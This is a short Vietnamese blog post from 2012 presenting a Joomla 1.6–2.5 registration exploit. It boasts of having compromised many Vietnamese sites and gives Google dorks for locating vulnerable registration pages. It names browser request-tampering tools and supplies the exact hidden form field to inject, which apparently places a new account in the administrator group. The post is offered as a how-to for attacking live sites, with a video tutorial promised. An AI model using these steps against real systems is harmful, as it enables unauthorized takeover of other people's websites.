Thứ Hai, 17 tháng 9, 2012

[Exploit] Bug Joomla 1.6,1.7 và 2.5.0 và 2.5.2

Hiện tại kakavn_85 khai thác được rất nhiều trang của VN còn bị dính lỗi này. Bài sau mình sẽ up video hướng dẫn cách khai thác
Dork:
index.php?option=com_users&view=registration      với Joomla 2.5
index.php?option=com_user&view=register               Joomla 1.x
Dùng các tiện ích có sẵn của Firefox và Chrome: Tamper Data, Live HTTP, FireBug.... 
Chèn vào form đăng ký của joomla đoạn code sau
<input name="jform[groups][]" value="7" />
 
Sau đó đăng ký bằng cách Reset Password 



0 nhận xét:

Đăng nhận xét